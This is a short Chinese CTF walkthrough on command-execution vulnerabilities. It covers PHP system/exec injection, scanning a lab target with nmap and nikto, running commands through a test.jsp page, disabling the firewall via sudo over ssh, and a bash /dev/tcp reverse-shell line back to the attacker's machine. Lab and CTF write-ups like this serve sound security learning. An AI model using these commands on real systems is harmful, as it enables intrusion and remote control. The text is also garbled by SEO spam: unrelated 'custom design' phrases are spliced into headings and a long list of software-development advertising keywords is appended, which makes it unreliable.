定制设计CTF-命令执行【超详细】

前言

作者简介:定制设计不知名白帽,定制设计网络安全学习者。

博客主页:

CTF-专栏:

定制设计网络安全交流社区:

目录


定制设计命令执行漏洞介绍

当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。

调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。

实验环境

kali 192.168.20.128

靶机 192.168.20.136

链接:https://pan.baidu.com/s/1OgpClNu8ggDEc_DBTRD57Q

提取码:t1x0

信息探测

nmap -sV 192.168.20.136

访问192.168.20.136:8080

发现敏感信息

敏感信息探测

nikto -host

发现/test.jsp并进行访问

进行系统命令执行

列出/tmp目录下的文件

列出/home目录下的内容

读取敏感信息

漏洞利用

利用ssh协议执行root权限的命令

ssh bill@localhost sudo -l

关闭Ubuntu中的防火墙

ssh bill@localhost sudo ufw disable

提权

监听端口

靶机反弹shell

ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1

查看flag

网站建设定制开发 软件系统开发定制 定制软件开发 软件开发定制 定制app开发 app开发定制 app开发定制公司 电商商城定制开发 定制小程序开发 定制开发小程序 客户管理系统开发定制 定制网站 定制开发 crm开发定制 开发公司 小程序开发定制 定制软件 收款定制开发 企业网站定制开发 定制化开发 android系统定制开发 定制小程序开发费用 定制设计 专注app软件定制开发 软件开发定制定制 知名网站建设定制 软件定制开发供应商 应用系统定制开发 软件系统定制开发 企业管理系统定制开发 系统定制开发